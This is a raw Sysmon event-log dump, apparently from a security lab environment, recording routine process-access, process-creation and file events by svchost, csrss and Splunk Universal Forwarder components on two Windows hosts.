07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F47E-60EB-6F79-00000000D001}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47E-60EB-6F79-00000000D001}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.316{0C1E0330-F47E-60EB-6F79-00000000D001}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2BBFB55185AD5A894E0D9EA12E37F6C,SHA256=06F9CC59400E81BD3727031501F96BBBB410415533C8620E034752E4A4906C86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.878{0C1E0330-F47F-60EB-7179-00000000D001}34163904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47F-60EB-7179-00000000D001}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.690{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.690{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.690{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F47F-60EB-7179-00000000D001}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.690{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47F-60EB-7179-00000000D001}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.691{0C1E0330-F47F-60EB-7179-00000000D001}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.409{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E647291EB62488CD894B059771422AC8,SHA256=41421338CCF599D1D3574C1BDC77C29E45788455C9E3E21BF8D484D1739F6843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:27.112{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A071330FBE8E101579BE89A3610223,SHA256=E888332A604587237ABB0D8D991B278B4DCEA0CD1D3EE6FC77700E0F41A1FD1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.175{0C1E0330-F47F-60EB-7079-00000000D001}1592900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47F-60EB-7079-00000000D001}1592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 